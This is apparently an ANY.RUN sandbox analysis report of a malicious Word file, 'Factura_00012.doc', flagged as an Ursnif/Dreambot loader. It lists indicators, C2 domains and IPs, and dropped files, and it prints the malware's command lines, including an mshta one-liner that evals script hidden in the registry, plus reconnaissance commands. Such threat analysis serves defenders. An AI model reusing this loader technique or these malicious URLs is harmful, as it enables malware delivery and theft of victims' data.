URL:

http://eweodinda.ru/Factura_00012.doc

Full analysis: https://app.any.run/tasks/68101558-4091-470e-ae10-701295ae293d
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: February 21, 2020, 15:43:11
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
gozi
ursnif
dreambot
Indicators:
MD5:

ACDA726731D95ED421FBCF9FD6556E4D

SHA1:

E1D3E981F25AADA8833864EAC65D6F20C46D5A9D

SHA256:

68CF6DCD865488918285066E713B67D477A682EDCAF5657CDF236129229DEDA3

SSDEEP:

3:N1KbzujyUbXAGn:CnujypGn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Downloads executable files from the Internet

      • powershell.exe (PID: 2856)

    • URSNIF was detected

      • iexplore.exe (PID: 3336)
      • iexplore.exe (PID: 3968)
      • explorer.exe (PID: 372)

    • DREAMBOT was detected

      • iexplore.exe (PID: 3336)
      • iexplore.exe (PID: 3968)
      • explorer.exe (PID: 372)

    • Connects to CnC server

      • iexplore.exe (PID: 3336)
      • iexplore.exe (PID: 3968)
      • explorer.exe (PID: 372)

    • Executes PowerShell scripts

      • mshta.exe (PID: 1500)

    • Starts Visual C# compiler

      • powershell.exe (PID: 2660)

    • Runs injected code in another process

      • powershell.exe (PID: 2660)

    • Application was injected by another process

      • explorer.exe (PID: 372)

    • URSNIF Shellcode was detected

      • explorer.exe (PID: 372)

    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 3796)

    • Actions looks like stealing of personal data

      • explorer.exe (PID: 372)

  • SUSPICIOUS

    • Starts Internet Explorer

      • explorer.exe (PID: 372)

    • Unusual connect from Microsoft Office

      • WINWORD.EXE (PID: 3888)

    • Executed via COM

      • WINWORD.EXE (PID: 3888)
      • iexplore.exe (PID: 2744)
      • iexplore.exe (PID: 3348)

    • Reads Internet Cache Settings

      • WINWORD.EXE (PID: 3888)

    • Starts Microsoft Office Application

      • WINWORD.EXE (PID: 3888)

    • Application launched itself

      • WINWORD.EXE (PID: 3888)

    • PowerShell script executed

      • powershell.exe (PID: 2856)

    • Creates files in the user directory

      • powershell.exe (PID: 2856)
      • powershell.exe (PID: 2660)
      • explorer.exe (PID: 372)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2856)

    • Uses RUNDLL32.EXE to load library

      • powershell.exe (PID: 2856)

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • explorer.exe (PID: 372)

    • Starts CMD.EXE for commands execution

      • explorer.exe (PID: 372)

    • Starts CMD.EXE for self-deleting

      • explorer.exe (PID: 372)

    • Uses SYSTEMINFO.EXE to read environment

      • cmd.exe (PID: 3576)

    • Uses TASKLIST.EXE to query information about running processes

      • cmd.exe (PID: 1744)

    • Loads DLL from Mozilla Firefox

      • explorer.exe (PID: 372)

    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 3972)

    • Starts NET.EXE for network exploration

      • cmd.exe (PID: 2380)

    • Searches for installed software

      • reg.exe (PID: 1168)

  • INFO

    • Application launched itself

      • iexplore.exe (PID: 1756)
      • iexplore.exe (PID: 2744)
      • iexplore.exe (PID: 3348)

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 1756)
      • iexplore.exe (PID: 4092)
      • iexplore.exe (PID: 2744)
      • iexplore.exe (PID: 2388)
      • iexplore.exe (PID: 3336)
      • iexplore.exe (PID: 3348)
      • iexplore.exe (PID: 3968)

    • Changes internet zones settings

      • iexplore.exe (PID: 1756)
      • iexplore.exe (PID: 3348)
      • iexplore.exe (PID: 2744)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3888)
      • WINWORD.EXE (PID: 3996)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3888)

    • Reads internet explorer settings

      • iexplore.exe (PID: 4092)
      • iexplore.exe (PID: 2388)
      • iexplore.exe (PID: 3336)
      • iexplore.exe (PID: 3968)
      • mshta.exe (PID: 1500)

    • Manual execution by user

      • powershell.exe (PID: 2856)
      • mshta.exe (PID: 1500)
      • cmd.exe (PID: 3796)

    • Reads settings of System Certificates

      • iexplore.exe (PID: 1756)

    • Adds / modifies Windows certificates

      • iexplore.exe (PID: 1756)

    • Changes settings of System certificates

      • iexplore.exe (PID: 1756)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
95
Monitored processes
39
Malicious processes
8
Suspicious processes
1

Behavior graph

Click at the process to see the details
start inject iexplore.exe iexplore.exe winword.exe winword.exe no specs powershell.exe rundll32.exe no specs iexplore.exe no specs iexplore.exe no specs iexplore.exe #URSNIF iexplore.exe #URSNIF iexplore.exe mshta.exe no specs powershell.exe csc.exe cvtres.exe no specs csc.exe cvtres.exe no specs #URSNIF explorer.exe cmd.exe ping.exe cmd.exe no specs systeminfo.exe no specs cmd.exe no specs cmd.exe no specs net.exe no specs cmd.exe no specs cmd.exe no specs nslookup.exe cmd.exe no specs cmd.exe no specs tasklist.exe no specs cmd.exe no specs cmd.exe no specs driverquery.exe no specs cmd.exe no specs cmd.exe no specs reg.exe no specs cmd.exe no specs cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
372C:\Windows\Explorer.EXEC:\Windows\explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\winanr.dll
c:\windows\system32\wshtcpip.dll
c:\windows\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
916cmd /C "echo -------- >> C:\Users\admin\AppData\Local\Temp\1408.bin1"C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1168reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s C:\Windows\system32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\reg.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1444nslookup 127.0.0.1 C:\Windows\system32\nslookup.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
nslookup
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\nslookup.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
1500"C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\89726C36-545A-A301-A6CD-C8873A517CAB\\Dmocusic'));if(!window.flag)close()</script>"C:\Windows\System32\mshta.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\windows\system32\mshta.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
1632"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\qqmc65er.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
Modules
Images
c:\windows\microsoft.net\framework\v2.0.50727\csc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
1688"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\tc3y4lix.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
Modules
Images
c:\windows\microsoft.net\framework\v2.0.50727\csc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
1744cmd /C "tasklist.exe /SVC >> C:\Users\admin\AppData\Local\Temp\1408.bin1"C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1756"C:\Program Files\Internet Explorer\iexplore.exe" "http://eweodinda.ru/Factura_00012.doc"C:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll
1856cmd /C "echo -------- >> C:\Users\admin\AppData\Local\Temp\1408.bin1"C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
Total events
11 943
Read events
4 066
Write events
5 406
Delete events
2 471

Modification events

(PID) Process:(372) explorer.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(4092) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(4092) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(1756) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
Operation:writeName:NextCheckForUpdateLowDateTime
Value:
3127936374
(PID) Process:(1756) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
Operation:writeName:NextCheckForUpdateHighDateTime
Value:
30795981
(PID) Process:(1756) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(1756) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(1756) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(1756) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Operation:writeName:CompatibilityFlags
Value:
0
(PID) Process:(1756) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:ProxyEnable
Value:
0
Executable files
1
Suspicious files
48
Text files
32
Unknown types
5

Dropped files

PID
Process
Filename
Type
3888WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR81EA.tmp.cvr
MD5:
SHA256:
3888WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{264B923D-EEA5-463C-A23D-9D5145CE0810}
MD5:
SHA256:
3888WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{752EF411-D25D-4506-80FE-95A8307E18C2}
MD5:
SHA256:
1756iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
1756iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF402D921491D96034.TMP
MD5:
SHA256:
1756iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF8762AADEF92C69B2.TMP
MD5:
SHA256:
3888WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSDbinary
MD5:
SHA256:
3888WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{5C3D0551-A7A3-49B3-B24F-C9A32B4DF6B0}.FSDbinary
MD5:
SHA256:
3996WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_D27E7F53-6E14-4AAD-B287-8C56658F6A9A.0\~DF243B9EE656BB57EC.TMP
MD5:
SHA256:
3888WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFCBF197F90554128A.TMP
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
26
TCP/UDP connections
35
DNS requests
13
Threats
44

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3888
WINWORD.EXE
HEAD
200
179.8.60.63:80
http://eweodinda.ru/Factura_00012.doc
CL
malicious
3888
WINWORD.EXE
HEAD
200
179.8.60.63:80
http://eweodinda.ru/Factura_00012.doc
CL
malicious
3888
WINWORD.EXE
HEAD
200
179.8.60.63:80
http://eweodinda.ru/Factura_00012.doc
CL
malicious
3968
iexplore.exe
GET
213.149.152.120:80
http://snezhkaie.ru/images/8CQ2Z_2F20b0/Q7mu5uUuSxV/EQxzPeWNyzT1g1/qldqUrEBY_2FGCpfgENEE/EZGkm_2FPaVBjJXD/M_2BHHJCkkhObXr/j5WpKg4131WYn126u8/_2F1QFeWK/9tdI2_2FLHHYvWa6uZIb/biBdBoGSD4zXlQE3c02/3b_2BsEWFIqBKWe68bKx1o/ntFnmcCX.avi
BG
malicious
4092
iexplore.exe
GET
200
179.8.60.63:80
http://eweodinda.ru/Factura_00012.doc
CL
document
135 Kb
malicious
3888
WINWORD.EXE
GET
200
179.8.60.63:80
http://eweodinda.ru/Factura_00012.doc
CL
document
135 Kb
malicious
1756
iexplore.exe
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D
US
der
1.47 Kb
whitelisted
1756
iexplore.exe
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D
US
der
1.47 Kb
whitelisted
372
explorer.exe
GET
200
46.214.214.39:80
http://goose-mongoose.at/images/WAmPE_2BiFndTCo2a/d8KtX5XAHLBW/hjgaJXu2Cc8/8DrjbcZ6a_2FMu/LS50nuyBsXxD2lbrcsQ1w/JrxA4YiSkeFdPXlE/8s01nYzKdHjrERd/DW2H2Cl_2FV_2F1h9K/_2FnLYDkp/5DmkjC6PHh_2Bx5JvnEA/y2ZxdfNY/N.gif
RO
binary
853 b
malicious
3888
WINWORD.EXE
OPTIONS
405
179.8.60.63:80
http://eweodinda.ru/
CL
html
157 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3888
WINWORD.EXE
179.8.60.63:80
eweodinda.ru
TELEFÓNICA CHILE S.A.
CL
suspicious
1756
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
824
svchost.exe
179.8.60.63:80
eweodinda.ru
TELEFÓNICA CHILE S.A.
CL
suspicious
1756
iexplore.exe
13.107.21.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
1756
iexplore.exe
152.199.19.161:443
iecvlist.microsoft.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
2856
powershell.exe
179.8.60.63:80
eweodinda.ru
TELEFÓNICA CHILE S.A.
CL
suspicious
1756
iexplore.exe
93.184.220.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
3968
iexplore.exe
213.149.152.120:80
eweodinda.ru
UltraNET Ltd
BG
malicious
3336
iexplore.exe
213.149.152.120:80
eweodinda.ru
UltraNET Ltd
BG
malicious
3348
iexplore.exe
213.149.152.120:80
eweodinda.ru
UltraNET Ltd
BG
malicious

DNS requests

Domain
IP
Reputation
eweodinda.ru
  • 179.8.60.63
  • 185.189.199.144
  • 190.213.16.177
  • 213.149.152.120
  • 88.203.214.58
  • 190.158.226.15
  • 155.133.93.30
  • 217.16.138.36
  • 109.175.7.8
  • 46.214.214.39
malicious
api.bing.com
  • 13.107.5.80
whitelisted
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
iecvlist.microsoft.com
  • 152.199.19.161
whitelisted
r20swj13mr.microsoft.com
  • 152.199.19.161
whitelisted
ocsp.digicert.com
  • 93.184.220.29
whitelisted
fantaniz.ru
unknown
snezhkaie.ru
  • 213.149.152.120
  • 88.203.214.58
  • 190.158.226.15
  • 155.133.93.30
  • 217.16.138.36
  • 109.175.7.8
  • 46.214.214.39
  • 179.8.60.63
  • 185.189.199.144
  • 190.213.16.177
malicious
goose-mongoose.at
  • 46.214.214.39
  • 179.8.60.63
  • 185.189.199.144
  • 190.213.16.177
  • 213.149.152.120
  • 88.203.214.58
  • 190.158.226.15
  • 155.133.93.30
  • 217.16.138.36
  • 109.175.7.8
malicious

Threats

PID
Process
Class
Message
4092
iexplore.exe
Potentially Bad Traffic
ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide)
4092
iexplore.exe
Misc activity
SUSPICIOUS [PTsecurity] Download DOC file with VBAScript
3888
WINWORD.EXE
Potentially Bad Traffic
ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide)
3888
WINWORD.EXE
Misc activity
SUSPICIOUS [PTsecurity] Download DOC file with VBAScript
2856
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2856
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3336
iexplore.exe
A Network Trojan was detected
AV TROJAN Ursnif Variant CnC Beacon 2019-09-18
3336
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
3336
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] Ursnif
3968
iexplore.exe
A Network Trojan was detected
AV TROJAN Ursnif Variant CnC Beacon 2019-09-18
16 ETPRO signatures available at the full report
Process
Message
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
http://eweodinda.ru/Factura_00012.doc